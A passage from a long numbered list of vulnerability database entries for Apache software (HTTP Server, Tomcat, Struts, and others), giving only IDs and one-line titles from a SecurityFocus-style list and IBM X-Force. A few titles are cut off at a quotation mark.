7053| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
7054| [5992] Apache HTDigest Insecure Temporary File Vulnerability
7055| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
7056| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
7057| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
7058| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
7059| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
7060| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
7061| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
7062| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
7063| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
7064| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
7065| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
7066| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
7067| [5485] Apache 2.0 Path Disclosure Vulnerability
7068| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
7069| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
7070| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
7071| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
7072| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
7073| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
7074| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
7075| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
7076| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
7077| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
7078| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
7079| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
7080| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
7081| [4437] Apache Error Message Cross-Site Scripting Vulnerability
7082| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
7083| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
7084| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
7085| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
7086| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
7087| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
7088| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
7089| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
7090| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
7091| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
7092| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
7093| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
7094| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
7095| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
7096| [3596] Apache Split-Logfile File Append Vulnerability
7097| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
7098| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
7099| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
7100| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
7101| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
7102| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
7103| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
7104| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
7105| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
7106| [3169] Apache Server Address Disclosure Vulnerability
7107| [3009] Apache Possible Directory Index Disclosure Vulnerability
7108| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
7109| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
7110| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
7111| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
7112| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
7113| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
7114| [2216] Apache Web Server DoS Vulnerability
7115| [2182] Apache /tmp File Race Vulnerability
7116| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
7117| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
7118| [1821] Apache mod_cookies Buffer Overflow Vulnerability
7119| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
7120| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
7121| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
7122| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
7123| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
7124| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
7125| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
7126| [1457] Apache::ASP source.asp Example Script Vulnerability
7127| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
7128| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
7129|
7130| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7131| [86258] Apache CloudStack text fields cross-site scripting
7132| [85983] Apache Subversion mod_dav_svn module denial of service
7133| [85875] Apache OFBiz UEL code execution
7134| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
7135| [85871] Apache HTTP Server mod_session_dbd unspecified
7136| [85756] Apache Struts OGNL expression command execution
7137| [85755] Apache Struts DefaultActionMapper class open redirect
7138| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
7139| [85574] Apache HTTP Server mod_dav denial of service
7140| [85573] Apache Struts Showcase App OGNL code execution
7141| [85496] Apache CXF denial of service
7142| [85423] Apache Geronimo RMI classloader code execution
7143| [85326] Apache Santuario XML Security for C++ buffer overflow
7144| [85323] Apache Santuario XML Security for Java spoofing
7145| [85319] Apache Qpid Python client SSL spoofing
7146| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
7147| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
7148| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
7149| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
7150| [84952] Apache Tomcat CVE-2012-3544 denial of service
7151| [84763] Apache Struts CVE-2013-2135 security bypass
7152| [84762] Apache Struts CVE-2013-2134 security bypass
7153| [84719] Apache Subversion CVE-2013-2088 command execution
7154| [84718] Apache Subversion CVE-2013-2112 denial of service
7155| [84717] Apache Subversion CVE-2013-1968 denial of service
7156| [84577] Apache Tomcat security bypass
7157| [84576] Apache Tomcat symlink
7158| [84543] Apache Struts CVE-2013-2115 security bypass
7159| [84542] Apache Struts CVE-2013-1966 security bypass
7160| [84154] Apache Tomcat session hijacking
7161| [84144] Apache Tomcat denial of service
7162| [84143] Apache Tomcat information disclosure
7163| [84111] Apache HTTP Server command execution
7164| [84043] Apache Virtual Computing Lab cross-site scripting
7165| [84042] Apache Virtual Computing Lab cross-site scripting
7166| [83782] Apache CloudStack information disclosure
7167| [83781] Apache CloudStack security bypass
7168| [83720] Apache ActiveMQ cross-site scripting
7169| [83719] Apache ActiveMQ denial of service
7170| [83718] Apache ActiveMQ denial of service
7171| [83263] Apache Subversion denial of service
7172| [83262] Apache Subversion denial of service
7173| [83261] Apache Subversion denial of service
7174| [83259] Apache Subversion denial of service
7175| [83035] Apache mod_ruid2 security bypass
7176| [82852] Apache Qpid federation_tag security bypass
7177| [82851] Apache Qpid qpid::framing::Buffer denial of service
7178| [82758] Apache Rave User RPC API information disclosure
7179| [82663] Apache Subversion svn_fs_file_length() denial of service
7180| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
7181| [82641] Apache Qpid AMQP denial of service
7182| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
7183| [82618] Apache Commons FileUpload symlink
7184| [82360] Apache HTTP Server manager interface cross-site scripting
7185| [82359] Apache HTTP Server hostnames cross-site scripting
7186| [82338] Apache Tomcat log/logdir information disclosure
7187| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
7188| [82268] Apache OpenJPA deserialization command execution
7189| [81981] Apache CXF UsernameTokens security bypass
7190| [81980] Apache CXF WS-Security security bypass
7191| [81398] Apache OFBiz cross-site scripting
7192| [81240] Apache CouchDB directory traversal
7193| [81226] Apache CouchDB JSONP code execution
7194| [81225] Apache CouchDB Futon user interface cross-site scripting
7195| [81211] Apache Axis2/C SSL spoofing
7196| [81167] Apache CloudStack DeployVM information disclosure
7197| [81166] Apache CloudStack AddHost API information disclosure
7198| [81165] Apache CloudStack createSSHKeyPair API information disclosure
7199| [80518] Apache Tomcat cross-site request forgery security bypass
7200| [80517] Apache Tomcat FormAuthenticator security bypass
7201| [80516] Apache Tomcat NIO denial of service
7202| [80408] Apache Tomcat replay-countermeasure security bypass
7203| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
7204| [80317] Apache Tomcat slowloris denial of service
7205| [79984] Apache Commons HttpClient SSL spoofing
7206| [79983] Apache CXF SSL spoofing
7207| [79830] Apache Axis2/Java SSL spoofing
7208| [79829] Apache Axis SSL spoofing
7209| [79809] Apache Tomcat DIGEST security bypass
7210| [79806] Apache Tomcat parseHeaders() denial of service
7211| [79540] Apache OFBiz unspecified
7212| [79487] Apache Axis2 SAML security bypass
7213| [79212] Apache Cloudstack code execution
7214| [78734] Apache CXF SOAP Action security bypass
7215| [78730] Apache Qpid broker denial of service
7216| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
7217| [78563] Apache mod_pagespeed module unspecified cross-site scripting
7218| [78562] Apache mod_pagespeed module security bypass
7219| [78454] Apache Axis2 security bypass
7220| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
7221| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
7222| [78321] Apache Wicket unspecified cross-site scripting
7223| [78183] Apache Struts parameters denial of service
7224| [78182] Apache Struts cross-site request forgery
7225| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
7226| [77987] mod_rpaf module for Apache denial of service
7227| [77958] Apache Struts skill name code execution
7228| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
7229| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
7230| [77568] Apache Qpid broker security bypass
7231| [77421] Apache Libcloud spoofing
7232| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
7233| [77046] Oracle Solaris Apache HTTP Server information disclosure
7234| [76837] Apache Hadoop information disclosure
7235| [76802] Apache Sling CopyFrom denial of service
7236| [76692] Apache Hadoop symlink
7237| [76535] Apache Roller console cross-site request forgery
7238| [76534] Apache Roller weblog cross-site scripting
7239| [76152] Apache CXF elements security bypass
7240| [76151] Apache CXF child policies security bypass
7241| [75983] MapServer for Windows Apache file include
7242| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
7243| [75558] Apache POI denial of service
7244| [75545] PHP apache_request_headers() buffer overflow
7245| [75302] Apache Qpid SASL security bypass
7246| [75211] Debian GNU/Linux apache 2 cross-site scripting
7247| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
7248| [74871] Apache OFBiz FlexibleStringExpander code execution
7249| [74870] Apache OFBiz multiple cross-site scripting
7250| [74750] Apache Hadoop unspecified spoofing
7251| [74319] Apache Struts XSLTResult.java file upload
7252| [74313] Apache Traffic Server header buffer overflow
7253| [74276] Apache Wicket directory traversal
7254| [74273] Apache Wicket unspecified cross-site scripting
7255| [74181] Apache HTTP Server mod_fcgid module denial of service
7256| [73690] Apache Struts OGNL code execution
7257| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
7258| [73100] Apache MyFaces in directory traversal
7259| [73096] Apache APR hash denial of service
7260| [73052] Apache Struts name cross-site scripting
7261| [73030] Apache CXF UsernameToken security bypass
7262| [72888] Apache Struts lastName cross-site scripting
7263| [72758] Apache HTTP Server httpOnly information disclosure
7264| [72757] Apache HTTP Server MPM denial of service
7265| [72585] Apache Struts ParameterInterceptor security bypass
7266| [72438] Apache Tomcat Digest security bypass
7267| [72437] Apache Tomcat Digest security bypass
7268| [72436] Apache Tomcat DIGEST security bypass
7269| [72425] Apache Tomcat parameter denial of service
7270| [72422] Apache Tomcat request object information disclosure
7271| [72377] Apache HTTP Server scoreboard security bypass
7272| [72345] Apache HTTP Server HTTP request denial of service
7273| [72229] Apache Struts ExceptionDelegator command execution
7274| [72089] Apache Struts ParameterInterceptor directory traversal
7275| [72088] Apache Struts CookieInterceptor command execution
7276| [72047] Apache Geronimo hash denial of service
7277| [72016] Apache Tomcat hash denial of service
7278| [71711] Apache Struts OGNL expression code execution
7279| [71654] Apache Struts interfaces security bypass
7280| [71620] Apache ActiveMQ failover denial of service
7281| [71617] Apache HTTP Server mod_proxy module information disclosure
7282| [71508] Apache MyFaces EL security bypass
7283| [71445] Apache HTTP Server mod_proxy security bypass
7284| [71203] Apache Tomcat servlets privilege escalation
7285| [71181] Apache HTTP Server ap_pregsub() denial of service
7286| [71093] Apache HTTP Server ap_pregsub() buffer overflow
7287| [70336] Apache HTTP Server mod_proxy information disclosure
7288| [69804] Apache HTTP Server mod_proxy_ajp denial of service
7289| [69472] Apache Tomcat AJP security bypass
7290| [69396] Apache HTTP Server ByteRange filter denial of service
7291| [69394] Apache Wicket multi window support cross-site scripting
7292| [69176] Apache Tomcat XML information disclosure
7293| [69161] Apache Tomcat jsvc information disclosure
7294| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
7295| [68541] Apache Tomcat sendfile information disclosure
7296| [68420] Apache XML Security denial of service
7297| [68238] Apache Tomcat JMX information disclosure
7298| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
7299| [67804] Apache Subversion control rules information disclosure
7300| [67803] Apache Subversion control rules denial of service
7301| [67802] Apache Subversion baselined denial of service
7302| [67672] Apache Archiva multiple cross-site scripting
7303| [67671] Apache Archiva multiple cross-site request forgery
7304| [67564] Apache APR apr_fnmatch() denial of service
7305| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
7306| [67515] Apache Tomcat annotations security bypass
7307| [67480] Apache Struts s:submit information disclosure
7308| [67414] Apache APR apr_fnmatch() denial of service
7309| [67356] Apache Struts javatemplates cross-site scripting
7310| [67354] Apache Struts Xwork cross-site scripting
7311| [66676] Apache Tomcat HTTP BIO information disclosure
7312| [66675] Apache Tomcat web.xml security bypass
7313| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
7314| [66241] Apache HttpComponents information disclosure
7315| [66154] Apache Tomcat ServletSecurity security bypass
7316| [65971] Apache Tomcat ServletSecurity security bypass
7317| [65876] Apache Subversion mod_dav_svn denial of service
7318| [65343] Apache Continuum unspecified cross-site scripting
7319| [65162] Apache Tomcat NIO connector denial of service
7320| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
7321| [65160] Apache Tomcat HTML Manager interface cross-site scripting
7322| [65159] Apache Tomcat ServletContect security bypass
7323| [65050] Apache CouchDB web-based administration UI cross-site scripting
7324| [64773] Oracle HTTP Server Apache Plugin unauthorized access
7325| [64473] Apache Subversion blame -g denial of service
7326| [64472] Apache Subversion walk() denial of service
7327| [64407] Apache Axis2 CVE-2010-0219 code execution
7328| [63926] Apache Archiva password privilege escalation
7329| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
7330| [63493] Apache Archiva credentials cross-site request forgery
7331| [63477] Apache Tomcat HttpOnly session hijacking
7332| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
7333| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
7334| [62959] Apache Shiro filters security bypass
7335| [62790] Apache Perl cgi module denial of service
7336| [62576] Apache Qpid exchange denial of service
7337| [62575] Apache Qpid AMQP denial of service
7338| [62354] Apache Qpid SSL denial of service
7339| [62235] Apache APR-util apr_brigade_split_line() denial of service
7340| [62181] Apache XML-RPC SAX Parser information disclosure
7341| [61721] Apache Traffic Server cache poisoning
7342| [61202] Apache Derby BUILTIN authentication functionality information disclosure
7343| [61186] Apache CouchDB Futon cross-site request forgery
7344| [61169] Apache CXF DTD denial of service
7345| [61070] Apache Jackrabbit search.jsp SQL injection
7346| [61006] Apache SLMS Quoting cross-site request forgery
7347| [60962] Apache Tomcat time cross-site scripting
7348| [60883] Apache mod_proxy_http information disclosure
7349| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
7350| [60264] Apache Tomcat Transfer-Encoding denial of service
7351| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
7352| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
7353| [59413] Apache mod_proxy_http timeout information disclosure
7354| [59058] Apache MyFaces unencrypted view state cross-site scripting
7355| [58827] Apache Axis2 xsd file include
7356| [58790] Apache Axis2 modules cross-site scripting
7357| [58299] Apache ActiveMQ queueBrowse cross-site scripting
7358| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
7359| [58056] Apache ActiveMQ .jsp source code disclosure
7360| [58055] Apache Tomcat realm name information disclosure
7361| [58046] Apache HTTP Server mod_auth_shadow security bypass
7362| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
7363| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
7364| [57429] Apache CouchDB algorithms information disclosure
7365| [57398] Apache ActiveMQ Web console cross-site request forgery
7366| [57397] Apache ActiveMQ createDestination.action cross-site scripting
7367| [56653] Apache HTTP Server DNS spoofing
7368| [56652] Apache HTTP Server DNS cross-site scripting
7369| [56625] Apache HTTP Server request header information disclosure
7370| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
7371| [56623] Apache HTTP Server mod_proxy_ajp denial of service
7372| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
7373| [55857] Apache Tomcat WAR files directory traversal
7374| [55856] Apache Tomcat autoDeploy attribute security bypass
7375| [55855] Apache Tomcat WAR directory traversal
7376| [55210] Intuit component for Joomla! Apache information disclosure
7377| [54533] Apache Tomcat 404 error page cross-site scripting
7378| [54182] Apache Tomcat admin default password
7379| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
7380| [53666] Apache HTTP Server Solaris pollset support denial of service
7381| [53650] Apache HTTP Server HTTP basic-auth module security bypass
7382| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
7383| [53041] mod_proxy_ftp module for Apache denial of service
7384| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
7385| [51953] Apache Tomcat Path Disclosure
7386| [51952] Apache Tomcat Path Traversal
7387| [51951] Apache stronghold-status Information Disclosure
7388| [51950] Apache stronghold-info Information Disclosure
7389| [51949] Apache PHP Source Code Disclosure
7390| [51948] Apache Multiviews Attack
7391| [51946] Apache JServ Environment Status Information Disclosure
7392| [51945] Apache error_log Information Disclosure
7393| [51944] Apache Default Installation Page Pattern Found
7394| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
7395| [51942] Apache AXIS XML External Entity File Retrieval
7396| [51941] Apache AXIS Sample Servlet Information Leak
7397| [51940] Apache access_log Information Disclosure
7398| [51626] Apache mod_deflate denial of service
7399| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
7400| [51365] Apache Tomcat RequestDispatcher security bypass
7401| [51273] Apache HTTP Server Incomplete Request denial of service
7402| [51195] Apache Tomcat XML information disclosure
7403| [50994] Apache APR-util xml/apr_xml.c denial of service
7404| [50993] Apache APR-util apr_brigade_vprintf denial of service
7405| [50964] Apache APR-util apr_strmatch_precompile() denial of service
7406| [50930] Apache Tomcat j_security_check information disclosure
7407| [50928] Apache Tomcat AJP denial of service
7408| [50884] Apache HTTP Server XML ENTITY denial of service
7409| [50808] Apache HTTP Server AllowOverride privilege escalation
7410| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
7411| [50059] Apache mod_proxy_ajp information disclosure
7412| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
7413| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
7414| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
7415| [49921] Apache ActiveMQ Web interface cross-site scripting
7416| [49898] Apache Geronimo Services/Repository directory traversal
7417| [49725] Apache Tomcat mod_jk module information disclosure
7418| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
7419| [49712] Apache Struts unspecified cross-site scripting
7420| [49213] Apache Tomcat cal2.jsp cross-site scripting
7421| [48934] Apache Tomcat POST doRead method information disclosure
7422| [48211] Apache Tomcat header HTTP request smuggling
7423| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
7424| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
7425| [47709] Apache Roller "
7426| [47104] Novell Netware ApacheAdmin console security bypass
7427| [47086] Apache HTTP Server OS fingerprinting unspecified
7428| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
7429| [45791] Apache Tomcat RemoteFilterValve security bypass
7430| [44435] Oracle WebLogic Apache Connector buffer overflow
7431| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
7432| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
7433| [44156] Apache Tomcat RequestDispatcher directory traversal
7434| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
7435| [43885] Oracle WebLogic Server Apache Connector buffer overflow
7436| [42987] Apache HTTP Server mod_proxy module denial of service
7437| [42915] Apache Tomcat JSP files path disclosure
7438| [42914] Apache Tomcat MS-DOS path disclosure
7439| [42892] Apache Tomcat unspecified unauthorized access
7440| [42816] Apache Tomcat Host Manager cross-site scripting
7441| [42303] Apache 403 error cross-site scripting
7442| [41618] Apache-SSL ExpandCert() authentication bypass
7443| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
7444| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
7445| [40614] Apache mod_jk2 HTTP Host header buffer overflow
7446| [40562] Apache Geronimo init information disclosure
7447| [40478] Novell Web Manager webadmin-apache.conf security bypass
7448| [40411] Apache Tomcat exception handling information disclosure
7449| [40409] Apache Tomcat native (APR based) connector weak security
7450| [40403] Apache Tomcat quotes and %5C cookie information disclosure
7451| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
7452| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
7453| [39867] Apache HTTP Server mod_negotiation cross-site scripting
7454| [39804] Apache Tomcat SingleSignOn information disclosure
7455| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
7456| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
7457| [39608] Apache HTTP Server balancer manager cross-site request forgery
7458| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
7459| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
7460| [39472] Apache HTTP Server mod_status cross-site scripting
7461| [39201] Apache Tomcat JULI logging weak security
7462| [39158] Apache HTTP Server Windows SMB shares information disclosure
7463| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
7464| [38951] Apache::AuthCAS Perl module cookie SQL injection
7465| [38800] Apache HTTP Server 413 error page cross-site scripting
7466| [38211] Apache Geronimo SQLLoginModule authentication bypass
7467| [37243] Apache Tomcat WebDAV directory traversal
7468| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
7469| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
7470| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
7471| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
7472| [36782] Apache Geronimo MEJB unauthorized access
7473| [36586] Apache HTTP Server UTF-7 cross-site scripting
7474| [36468] Apache Geronimo LoginModule security bypass
7475| [36467] Apache Tomcat functions.jsp cross-site scripting
7476| [36402] Apache Tomcat calendar cross-site request forgery
7477| [36354] Apache HTTP Server mod_proxy module denial of service
7478| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
7479| [36336] Apache Derby lock table privilege escalation
7480| [36335] Apache Derby schema privilege escalation
7481| [36006] Apache Tomcat "
7482| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
7483| [35999] Apache Tomcat \"
7484| [35795] Apache Tomcat CookieExample cross-site scripting
7485| [35536] Apache Tomcat SendMailServlet example cross-site scripting
7486| [35384] Apache HTTP Server mod_cache module denial of service
7487| [35097] Apache HTTP Server mod_status module cross-site scripting
7488| [35095] Apache HTTP Server Prefork MPM module denial of service
7489| [34984] Apache HTTP Server recall_headers information disclosure
7490| [34966] Apache HTTP Server MPM content spoofing
7491| [34965] Apache HTTP Server MPM information disclosure
7492| [34963] Apache HTTP Server MPM multiple denial of service
7493| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
7494| [34869] Apache Tomcat JSP example Web application cross-site scripting
7495| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
7496| [34496] Apache Tomcat JK Connector security bypass
7497| [34377] Apache Tomcat hello.jsp cross-site scripting
7498| [34212] Apache Tomcat SSL configuration security bypass
7499| [34210] Apache Tomcat Accept-Language cross-site scripting
7500| [34209] Apache Tomcat calendar application cross-site scripting
7501| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
7502| [34167] Apache Axis WSDL file path disclosure
7503| [34068] Apache Tomcat AJP connector information disclosure
7504| [33584] Apache HTTP Server suEXEC privilege escalation
7505| [32988] Apache Tomcat proxy module directory traversal
7506| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
7507| [32708] Debian Apache tty privilege escalation
7508| [32441] ApacheStats extract() PHP call unspecified
7509| [32128] Apache Tomcat default account
7510| [31680] Apache Tomcat RequestParamExample cross-site scripting
7511| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
7512| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
7513| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
7514| [30456] Apache mod_auth_kerb off-by-one buffer overflow
7515| [29550] Apache mod_tcl set_var() format string
7516| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
7517| [28357] Apache HTTP Server mod_alias script source information disclosure
7518| [28063] Apache mod_rewrite off-by-one buffer overflow
7519| [27902] Apache Tomcat URL information disclosure
7520| [26786] Apache James SMTP server denial of service
7521| [25680] libapache2 /tmp/svn file upload
7522| [25614] Apache Struts lookupMap cross-site scripting
7523| [25613] Apache Struts ActionForm denial of service
7524| [25612] Apache Struts isCancelled() security bypass
7525| [24965] Apache mod_python FileSession command execution
7526| [24716] Apache James spooler memory leak denial of service
7527| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
7528| [24158] Apache Geronimo jsp-examples cross-site scripting
7529| [24030] Apache auth_ldap module multiple format strings
7530| [24008] Apache mod_ssl custom error message denial of service
7531| [24003] Apache mod_auth_pgsql module multiple syslog format strings
7532| [23612] Apache mod_imap referer field cross-site scripting
7533| [23173] Apache Struts error message cross-site scripting
7534| [22942] Apache Tomcat directory listing denial of service
7535| [22858] Apache Multi-Processing Module code allows denial of service
7536| [22602] RHSA-2005:582 updates for Apache httpd not installed
7537| [22520] Apache mod-auth-shadow "
7538| [22466] ApacheTop symlink
7539| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
7540| [22006] Apache HTTP Server byte-range filter denial of service
7541| [21567] Apache mod_ssl off-by-one buffer overflow
7542| [21195] Apache HTTP Server header HTTP request smuggling
7543| [20383] Apache HTTP Server htdigest buffer overflow
7544| [19681] Apache Tomcat AJP12 request denial of service
7545| [18993] Apache HTTP server check_forensic symlink attack
7546| [18790] Apache Tomcat Manager cross-site scripting
7547| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
7548| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
7549| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
7550| [17961] Apache Web server ServerTokens has not been set
7551| [17930] Apache HTTP Server HTTP GET request denial of service
7552| [17785] Apache mod_include module buffer overflow
7553| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
7554| [17473] Apache HTTP Server Satisfy directive allows access to resources
7555| [17413] Apache htpasswd buffer overflow
7556| [17384] Apache HTTP Server environment variable configuration file buffer overflow
7557| [17382] Apache HTTP Server IPv6 apr_util denial of service
7558| [17366] Apache HTTP Server mod_dav module LOCK denial of service
7559| [17273] Apache HTTP Server speculative mode denial of service
7560| [17200] Apache HTTP Server mod_ssl denial of service
7561| [16890] Apache HTTP Server server-info request has been detected
7562| [16889] Apache HTTP Server server-status request has been detected
7563| [16705] Apache mod_ssl format string attack
7564| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
7565| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
7566| [16230] Apache HTTP Server PHP denial of service
7567| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
7568| [15958] Apache HTTP Server authentication modules memory corruption
7569| [15547] Apache HTTP Server mod_disk_cache local information disclosure
7570| [15540] Apache HTTP Server socket starvation denial of service
7571| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
7572| [15422] Apache HTTP Server mod_access information disclosure
7573| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
7574| [15293] Apache for Cygwin "
7575| [15065] Apache-SSL has a default password
7576| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
7577| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
7578| [14751] Apache Mod_python output filter information disclosure
